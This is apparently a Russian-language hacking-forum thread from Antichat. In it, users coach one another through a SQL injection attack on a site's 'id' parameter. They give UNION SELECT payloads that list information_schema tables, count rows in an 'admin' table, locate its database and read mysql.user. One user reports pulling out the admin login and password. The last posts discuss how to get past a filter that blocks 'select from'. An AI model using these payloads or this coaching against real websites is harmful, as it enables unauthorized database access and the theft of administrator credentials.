ANTICHAT — форум по информационной безопасности, OSINT и технологиям

2 Adm1n4eG
try

http://site.com/body.php?id=-1+union+all+select+1,2,3,concat(0x3a,table_name,0x 3a,table_schema),5,6,7,8+from+i nformation_schema.tables+limit+1,1--

Тогда уж лимит+17,1

Adm1n4eG, вот, читай: http://forum.antichat.ru/thread104591.html

Читай там вопрос номер 3.

Тебе же сказали:

1. http://site.com/body.php?id=-1+union+all+select+1,2,3,count(*),5,6,7,8+from+adm in--

- подсчитает колв-во записей в админ, если ноль - то чего вы хочите, как грица

2. . http://site.com/body.php?id=-1+union+all+select+1,2,3,table_schema+from+informa tion_schema.columns+where+table_name=0x61646d696e

- узнай точную БД, где находится табла admin, может просто не в текущей БД, а потом делай запросы подставляя сначала название_бд.admin

3. unhex(hex(данные)), aes_decrypt(aes_encrypt(данные)) - просто несповпадение кодировок, в общем проверяй

4. Просто нет прав на чтение данной таблицы у текущего юзера

Тож забыл сразу сказать в таблице admin есть 2 колонки account и pwd но почему то при проверке count(*) все равно появилась ошибка...

R1dex большое спасибо!!!

эт я както упустил )))
все таки оказалось что таблица находится не в той базе с которой работает скрип
проверил это таким образом:

Запрос выдал: bwbvdisk

Итоговый запрос и получение админского логина и пасса:
Всем кто помогал спс!

ну вообще если в таблице нет ниодной записи ошибки не будет, а на страницу выведуться null'и
пробуй select user from mysql.user limit 9999999

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Можно ли в подзапросах обойтись без использования from? Union фильтруется,как и from

нет, искать обход фильтра

какой обход? фильтрация всей конструкции select from

Если встречается select from подряд,то форбидн.А вот если from select или отдельно,то нет.